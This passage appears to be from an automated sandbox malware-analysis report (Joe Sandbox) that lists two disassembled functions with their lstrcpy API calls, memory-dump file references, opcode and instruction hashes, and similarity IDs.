                                  • Opcode ID: f8ee3216b64f7ade45872adb71664f9a856fc10b347d781c1224b87f4d85c2e3
                                  • Instruction ID: 9c6fd31c2f8bfd74e401d1851a5cbe1020bee62f86349718d7b3b866a8c12413
                                  • Opcode Fuzzy Hash: f8ee3216b64f7ade45872adb71664f9a856fc10b347d781c1224b87f4d85c2e3
                                  • Instruction Fuzzy Hash: 89310874A01B52AFC725DF3AC598952BBF5FF497047044A2EA896C3B90DB30F811CB90
                                  Function 00401570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 004015A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 004015D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00401611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00401649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: f09723c9e2503c0408d9d0d70a94ac1d9988e8f220c0a9d6d6258904a3e67829
                                  • Instruction ID: 223902fb027d33c2111d10c62c1b29faaf923c28b8fcbc39c1276fd9ec10c119
                                  • Opcode Fuzzy Hash: f09723c9e2503c0408d9d0d70a94ac1d9988e8f220c0a9d6d6258904a3e67829
                                  • Instruction Fuzzy Hash: E3213C74601B029FD735DF3AC854A17B7F9AF44700B044A2EA486DBB90DB38F851CBA4
                                  Function 003E1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 003E162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E1693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 550209d33ef11ab4900a504bc7f4201ff1e25ebdc4c6d7b1a01e035d57aa503e
                                  • Instruction ID: 6e00bba285572adc45dc446e4eb42e7be3647a8e8649d8fd3136e9c900cbf89f
                                  • Opcode Fuzzy Hash: 550209d33ef11ab4900a504bc7f4201ff1e25ebdc4c6d7b1a01e035d57aa503e
                                  • Instruction Fuzzy Hash: 64111FB4A117529BDB259F36D419927B7F8BF447017094A2DA896C7A80EB30F851CB60